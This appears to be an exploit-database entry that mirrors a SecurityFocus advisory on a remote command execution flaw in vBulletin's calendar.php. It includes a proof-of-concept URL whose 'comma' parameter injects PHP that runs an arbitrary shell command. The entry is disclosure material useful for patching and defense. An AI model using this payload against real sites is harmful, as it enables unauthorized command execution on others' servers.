source: http://www.securityfocus.com/bid/5820/info A remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters. An attacker can exploit this vulnerability to execute malicious commands on the vulnerable system. http://www.example.com/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22 where <command> signifies a command to be executed on the system.
Related ExploitsTrying to match CVEs (1): CVE-2002-1660
Trying to match OSVDBs (1): 3299
Other Possible E-DB Search Terms: vBulletin 2.0.3, vBulletin